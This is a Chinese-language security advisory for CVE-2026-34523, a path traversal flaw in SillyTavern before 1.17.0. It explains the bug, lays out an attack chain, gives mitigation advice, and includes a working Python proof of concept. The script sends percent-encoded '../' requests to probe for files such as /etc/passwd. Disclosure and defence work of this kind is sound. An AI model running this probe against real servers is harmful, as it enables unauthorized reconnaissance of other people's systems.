CVE-2026-34523 CVSS 5.3 中危

CVE-2026-34523 SillyTavern路径遍历漏洞

披露日期: 2026-04-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34523

漏洞类型

路径遍历

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

SillyTavern

漏洞概述

SillyTavern是一个本地安装的用户界面，用于与文本生成大语言模型等交互。在1.17.0版本之前，其静态文件路由处理程序存在路径遍历漏洞。未经身份认证的攻击者可以通过发送百分比编码的“../”序列（%2E%2E%2F）来确定服务器文件系统上任意位置文件的存在。该问题已在1.17.0版本中修复。

技术细节

该漏洞源于SillyTavern静态文件路由处理程序对用户输入验证不当。攻击者无需经过身份认证即可向受影响的静态文件路由端点发送特制的HTTP请求。利用方式是在请求路径中插入经过百分比编码的目录遍历序列“%2E%2E%2F”（即“../”）。由于应用程序未正确过滤或规范化这些序列，攻击者能够绕过web根目录限制，访问服务器文件系统上的其他路径。虽然该漏洞主要导致信息泄露（确认文件存在），而非直接读取文件内容，但它为攻击者提供了侦察服务器的机会。成功利用此漏洞需要目标服务暴露在网络上。

攻击链分析

STEP 1

侦察

攻击者发现目标服务器上运行着SillyTavern应用，且版本低于1.17.0。

STEP 2

构造载荷

攻击者构造包含百分比编码路径遍历序列（%2E%2E%2F）的HTTP请求，旨在访问Web根目录之外的文件。

STEP 3

发送请求

攻击者将恶意请求发送到SillyTavern的静态文件路由处理程序。

STEP 4

分析响应

根据服务器返回的HTTP状态码（如200表示存在，404表示不存在），攻击者推断出服务器上特定文件或目录是否存在。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_file_existence(target_url, file_path):
    """
    Check if a file exists on the server using path traversal.
    """
    # Encode the traversal sequence and the target file path
    # Payload: ../../../etc/passwd -> %2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
    encoded_payload = file_path.replace("../", "%2E%2E%2F")
    
    # Construct the full URL assuming the static file endpoint
    # Note: The actual endpoint may vary based on SillyTavern configuration
    exploit_url = f"{target_url}/scripts/{encoded_payload}"
    
    try:
        response = requests.get(exploit_url, timeout=5)
        
        if response.status_code == 200:
            print(f"[+] File likely exists: {file_path}")
            return True
        elif response.status_code == 404:
            print(f"[-] File not found: {file_path}")
            return False
        else:
            print(f"[?] Server returned status code: {response.status_code}")
            return None
    except Exception as e:
        print(f"[!] Error connecting to server: {e}")
        return None

if __name__ == "__main__":
    target = "http://localhost:8000" # Replace with actual target
    # Example targets to check
    targets = [
        "../../../etc/passwd",
        "../../../windows/system32/drivers/etc/hosts"
    ]
    
    for t in targets:
        check_file_existence(target, t)

影响范围

SillyTavern < 1.17.0

防御指南

临时缓解措施

建议立即将SillyTavern更新到1.17.0版本。若无法立即更新，应确保应用仅监听本地回环地址（127.0.0.1），并通过防火墙规则阻止外部对相关端口的访问，以防止远程攻击者利用此漏洞进行文件探测。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表